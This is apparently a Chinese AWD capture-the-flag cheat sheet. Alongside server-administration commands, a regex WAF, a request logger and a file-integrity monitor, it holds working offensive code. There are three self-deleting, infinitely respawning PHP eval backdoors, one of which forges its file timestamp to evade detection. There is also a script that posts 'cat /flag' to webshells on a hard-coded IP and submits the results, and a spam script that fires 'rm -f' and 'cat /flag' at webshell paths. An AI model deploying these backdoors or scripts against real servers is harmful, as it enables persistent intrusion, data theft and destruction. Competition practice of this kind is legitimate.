常用命令
tar -zcvf web.tar.gz /var/www/html/ 将/var/www/html压缩一份到web.tar.gz
tar -xzvf web.tar.gz 解压web.tar.gz
mysql -uroot -proot #进入数据库,用户名和密码都是root
备份服务器上所有数据库
mysqldump –-all-databases > 123.sql
备份指定数据库:
mysqldump –u username –p password databasename > bak.sql
mysql备份单个数据库命令
mysqldump --column-statistics=0 -h主机ip -P端口号 -u数据库用户名 -p数据库密码 数据库名称 > 想要备份的文件名称.sql
netstat -tuln 查看当前系统上开放的端口和相应的服务
netstat -ano/-a #查看端口情况
lsof -i:端口号 或者 netstat -tunlp|grep 端口号 查看指定端口被那个进程占用
iptables -A INPUT -p tcp --dport <端口号> -j DROP 拒绝该端口的连接请求,即关闭端口
iptables -I INPUT -s ***.***.***.*** -j DROP 封杀ip 如:iptables -I INPUT -s 123.44.55.66 -j DROP
iptables -D INPUT -s ***.***.***.*** -j DROP 解封ip
grep -r “flag” /var/www/html/ #查找默认FLAG
find /var/www/html -name ‘flag*.*’ # 查找名字为flag的
find /var/www/html -name *.php -mmin -20 #查看最近20分钟,在/var/www/html目录下,后缀名为.php的,被修改的文件
find ./ -name '*.php' | xargs wc -l | sort -u #寻找行数最短文件
grep -r --include=*.php '[^a-z]eval($_POST' /var/www/html #查包含关键字的php文件
find /var/www/html -type f -name "*.php" | xargs grep "eval(" |more
批量获取提交flag
import requests
def get_flag():
for i in range(8802,8804):
url='http://121.40.173.182:'+str(i)+'/footer.php'
data={
'shell':'cat /flag'
}
result=requests.post(url=url,data=data,timeout=1).content.decode('utf-8')
print(result)
with open(r'result.txt','a+') as f:
f.write(result+'\n')
f.close()
def post_flag():
for flag in open('result.txt'):
flag=flag.replace('\n','')
url='http://121.40.173.182:8080/flag_file.php?token=team1&flag='+flag
result=requests.get(url=url).status_code
if result==200:
print(flag+'提交成功')
if __name__ == '__main__':
get_flag()
post_flag()
不死马
普通
<?php
ignore_user_abort(true);//进程运行
set_time_limit(0);
unlink(__FILE__);
$file='.shell.php';
$code='<?php if(md5($_POST["pass"])=="e10adc3949ba59abbe56e057f20f883e"){@eval($_POST[a]);} ?>';
while(1){
file_put_contents($file,$code);
usleep(5000);
}
?>
<?php
ignore_user_abort(true); // ignore_user_abort 设置与客户机断开是否会终止脚本的执行,如果设置为 true,则忽略与用户的断开,如果设置为 false,会导致脚本停止运行
set_time_limit(0); // set_time_limit设置允许脚本运行的时间,单位为秒。如果超过了此设置,脚本返回一个致命的错误。默认值为30秒,如果设置为零,没有时间方面的限制。
unlink(__FILE__); // unlink() 删除函数的方法,__FILE__代表当前文件自己,删除自己防止被查杀
$file = '.index.php';
$code = '<?php if(md5($_GET["pass"])=="588b0909be46df2e992915a156a4e848"){@eval($_POST[a]);} ?>'; // 定义后面代码
while (1){ // 设置无限循环
file_put_contents($file,$code); // file_put_contents()函数可以将一个字符串写入文件,写入后门代码
usleep(5000); // usleep()函数是把调用该函数的线程挂起一段时间(就是暂停执行一段时间),单位是微秒(百万分之一秒)
}
?>
高级
<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = './.index.php';
$code = '<?php if(md5($_POST["pass"])=="3a50065e1709acc47ba0c9238294364f"){@eval($_POST[a]);} ?>';
//pass=Sn3rtf4ck 马儿用法:fuckyou.php?pass=Sn3rtf4ck&a=command
while (1){
file_put_contents($file,$code);
system('touch -m -d "2023-10-28 14:00:00" .index.php');
usleep(50000);
}
?>
//touch -d "2023-10-28 14:00:00" .index.php 只修改文件的修改时间,
//这里.index.php的文件时间一直都是2023-10-28 14:00:00了
克制不死马
<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = 'x.php'; // 注意这里的文件名要与不死马的一样
$code = '干掉不死马,随便写,不写也可以';
while (1){
file_put_contents($file,$code);
usleep(1000); // 不死马这里是5000微秒,我们就1000这样生成文件的速度就比他快,就能一直替换掉他
}
?>
waf(php)
<!--
require_once('waf.php')
PHPCMS V9 \phpcms\base.php
PHPWIND8.7 \data\sql_config.php
DEDECMS5.7 \data\common.inc.php
DiscuzX2 \config\config_global.php
Wordpress \wp-config.php
Metinfo \include\head.php
-->
<?php
function customError($errno, $errstr, $errfile, $errline) {
echo "<b>Error number:</b> [$errno],error on line $errline in $errfile<br />";
die();
}
set_error_handler("customError", E_ERROR);
$getfilter="'|(and|or)\\b.+?(>|<|=|in|like)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
$postfilter="\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
$cookiefilter="\\b(and|or)\\b.{1.6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
function DefendAttack($StrFiltKey, $StrFiltValue, $ArrFiltReq) {
if(is_array($StrFiltValue)) {
$StrFiltValue = implode($StrFiltValue);
}
if(preg_match("/".$ArrFiltReq."/is", $StrFiltValue)==1) {
//slog("<br><br>操作IP: ".$_SERVER["REMOTE_ADDR"]."<br>操作时间: ".strftime("%Y-%m-%d %H:%M:%S")."<br>操作页面: ".$_SERVER["PHP_SELF"]."<br>提交方式: ".$_SERVER["REQUEST_METHOD"]."<br>提交参数: ".$StrFiltKey."<br>提交参数: ".$StrFiltValue);
print "Prohibition operation!";
exit();
}
}
//$ArrPGC = array_merge($_GET, $_POST, $_COOKIE);
foreach ($_GET as $key => $value) {
DefendAttack($key, $value, $getfilter);
}
foreach ($_POST as $key => $value) {
DefendAttack($key, $value, $postfilter);
}
foreach ($_COOKIE as $key => $value) {
DefendAttack($key, $value, $cookiefilter);
}
if (file_exists(filename)) {
# code...
}
function slog($logs) {
$toppath = $_SERVER["DOCUMENT_ROOT"]."/tmp/log1.html";
$Ts=fopen($toppath, "a+");
fputs($Ts, $logs."\r\n");
fclose($Ts);
}
?>
搅屎棍
import requests
import time
def scan_attack():
file={'shell.php','x.php','index.php','web.php','1.php'}
payload={'cat /flag','ls -al','rm -f','echo 1'}
while(1):
for i in range(8802, 8804):
for ii in file:
url='http://192.168.76.156:'+ str(i)+'/'+ii
for iii in payload:
data={
'payload':iii
}
try:
requests.post(url,data=data)
print("正在搅屎:"+str(i)+'|'+ii+'|'+iii)
time.sleep(0.5)
except Exception as e:
time.sleep(0.5)
pass
if __name__ == '__main__':
scan_attack()
访问历史(日志监控php)
<?php
date_default_timezone_set("Asia/Shanghai");
if (!function_exists('getallheaders')) {
function getallheaders() {
$headers = [];
foreach ($_SERVER as $name => $value) {
if (substr($name, 0, 5) == 'HTTP_') {
$headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
}
}
return $headers;
}
}
function WAF_log() {
global $WAF_query, $WAF_headers, $WAF_post, $WAF_log;
$tmp = "[" . date('y-m-d H:i:s') . "]\n";
$tmp .= "SRC IP: " . $_SERVER["REMOTE_ADDR"]."\n";
$tmp .= $_SERVER['REQUEST_METHOD'].''.'http://'.$_SERVER['SERVER_NAME'].':'.$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"]."\n";
foreach($WAF_headers as $k => $v) {
if($k=='Accept-Encoding'||$k=='Accept-Language'||$k=='Accept'||$k=='User-Agent'||$k=='Referer'||$k=='Cookie'||$k=='X-Forwarded-For')
$tmp .= $k . ': ' . $v . "\n";
}
if (!empty($WAF_post)) {
$tmp .= "\n". $WAF_post . "\n";
}
$tmp .= "\n";
@file_put_contents($WAF_log."log_".date("H",time()), $tmp, FILE_APPEND);
}
$WAF_query = $_SERVER['QUERY_STRING'];
$WAF_headers = getallheaders();
$WAF_post = @file_get_contents('php://input');
$WAF_log = '/tmp/';
$WAF_AD_log = '';
WAF_log();
?>
//文件会写在tmp目录,以log_加时间(小时)命名
//使用 tail -f log_20 就能监控了
文件监控
# -*- coding: utf-8 -*-
import os
import re
import hashlib
import shutil
import ntpath
import time
import sys
# 设置系统字符集,防止写入log时出现错误
reload(sys)
sys.setdefaultencoding('utf-8')
CWD = os.getcwd()
FILE_MD5_DICT = {} # 文件MD5字典
ORIGIN_FILE_LIST = []
# 特殊文件路径字符串
Special_path_str = 'drops_B0503373BDA6E3C5CD4E5118C02ED13A' #drops_md5(icecoke1024)
bakstring = 'back_CA7CB46E9223293531C04586F3448350' #bak_md5(icecoke1)
logstring = 'log_8998F445923C88FF441813F0F320962C' #log_md5(icecoke2)
webshellstring = 'webshell_988A15AB87447653EFB4329A90FF45C5'#webshell_md5(icecoke3)
difffile = 'difference_3C95FA5FB01141398896EDAA8D667802' #diff_md5(icecoke4)
Special_string = 'drops_log' # 免死金牌
UNICODE_ENCODING = "utf-8"
INVALID_UNICODE_CHAR_FORMAT = r"\?%02x"
# 文件路径字典
spec_base_path = os.path.realpath(os.path.join(CWD, Special_path_str))
Special_path = {
'bak' : os.path.realpath(os.path.join(spec_base_path, bakstring)),
'log' : os.path.realpath(os.path.join(spec_base_path, logstring)),
'webshell' : os.path.realpath(os.path.join(spec_base_path, webshellstring)),
'difffile' : os.path.realpath(os.path.join(spec_base_path, difffile)),
}
def isListLike(value):
return isinstance(value, (list, tuple, set))
# 获取Unicode编码
def getUnicode(value, encoding=None, noneToNull=False):
if noneToNull and value is None:
return NULL
if isListLike(value):
value = list(getUnicode(_, encoding, noneToNull) for _ in value)
return value
if isinstance(value, unicode):
return value
elif isinstance(value, basestring):
while True:
try:
return unicode(value, encoding or UNICODE_ENCODING)
except UnicodeDecodeError, ex:
try:
return unicode(value, UNICODE_ENCODING)
except:
value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
else:
try:
return unicode(value)
except UnicodeDecodeError:
return unicode(str(value), errors="ignore")
# 目录创建
def mkdir_p(path):
import errno
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
# 获取当前所有文件路径
def getfilelist(cwd):
filelist = []
for root,subdirs, files in os.walk(cwd):
for filepath in files:
originalfile = os.path.join(root, filepath)
if Special_path_str not in originalfile:
filelist.append(originalfile)
return filelist
# 计算机文件MD5值
def calcMD5(filepath):
try:
with open(filepath,'rb') as f:
md5obj = hashlib.md5()
md5obj.update(f.read())
hash = md5obj.hexdigest()
return hash
# 文件MD5消失即为文件被删除,恢复文件
except Exception, e:
print u'[*] 文件被删除 : ' + getUnicode(filepath)
shutil.copyfile(os.path.join(Special_path['bak'], ntpath.basename(filepath)), filepath)
for value in Special_path:
mkdir_p(Special_path[value])
ORIGIN_FILE_LIST = getfilelist(CWD)
FILE_MD5_DICT = getfilemd5dict(ORIGIN_FILE_LIST)
print u'[+] 被删除文件已恢复!'
try:
f = open(os.path.join(Special_path['log'], 'log.txt'), 'a')
f.write('deleted_file: ' + getUnicode(filepath) + ' 时间: ' + getUnicode(time.ctime()) + '\n')
f.close()
except Exception as e:
print u'[-] 记录失败 : 被删除文件: ' + getUnicode(filepath)
pass
# 获取所有文件MD5
def getfilemd5dict(filelist = []):
filemd5dict = {}
for ori_file in filelist:
if Special_path_str not in ori_file:
md5 = calcMD5(os.path.realpath(ori_file))
if md5:
filemd5dict[ori_file] = md5
return filemd5dict
# 备份所有文件
def backup_file(filelist=[]):
for filepath in filelist:
if Special_path_str not in filepath:
shutil.copy2(filepath, Special_path['bak'])
if __name__ == '__main__':
print u'---------持续监测文件中------------'
for value in Special_path:
mkdir_p(Special_path[value])
# 获取所有文件路径,并获取所有文件的MD5,同时备份所有文件
ORIGIN_FILE_LIST = getfilelist(CWD)
FILE_MD5_DICT = getfilemd5dict(ORIGIN_FILE_LIST)
backup_file(ORIGIN_FILE_LIST)
print u'[*] 所有文件已备份完毕!'
while True:
file_list = getfilelist(CWD)
# 移除新上传文件
diff_file_list = list(set(file_list) ^ set(ORIGIN_FILE_LIST))
if len(diff_file_list) != 0:
for filepath in diff_file_list:
try:
f = open(filepath, 'r').read()
except Exception, e:
break
if Special_string not in f:
try:
print u'[*] 查杀疑似WebShell上传文件: ' + getUnicode(filepath)
shutil.move(filepath, os.path.join(Special_path['webshell'], ntpath.basename(filepath) + '.txt'))
print u'[+] 新上传文件已删除!'
except Exception as e:
print u'[!] 移动文件失败, "%s" 疑似WebShell,请及时处理.'%getUnicode(filepath)
try:
f = open(os.path.join(Special_path['log'], 'log.txt'), 'a')
f.write('new_file: ' + getUnicode(filepath) + ' 时间: ' + str(time.ctime()) + '\n')
f.close()
except Exception as e:
print u'[-] 记录失败 : 上传文件: ' + getUnicode(e)
# 防止任意文件被修改,还原被修改文件
md5_dict = getfilemd5dict(ORIGIN_FILE_LIST)
for filekey in md5_dict:
if md5_dict[filekey] != FILE_MD5_DICT[filekey]:
try:
f = open(filekey, 'r').read()
except Exception, e:
break
if Special_string not in f:
try:
print u'[*] 该文件被修改 : ' + getUnicode(filekey)
shutil.move(filekey, os.path.join(Special_path['difffile'], ntpath.basename(filekey) + '.txt'))
shutil.copyfile(os.path.join(Special_path['bak'], ntpath.basename(filekey)), filekey)
print u'[+] 文件已复原!'
except Exception as e:
print u'[!] 移动文件失败, "%s" 疑似WebShell,请及时处理.'%getUnicode(filekey)
try:
f = open(os.path.join(Special_path['log'], 'log.txt'), 'a')
f.write('difference_file: ' + getUnicode(filekey) + ' 时间: ' + getUnicode(time.ctime()) + '\n')
f.close()
except Exception as e:
print u'[-] 记录失败 : 被修改文件: ' + getUnicode(filekey)
pass
time.sleep(2)
注:内容来源于网络,如有不满,请联系我删除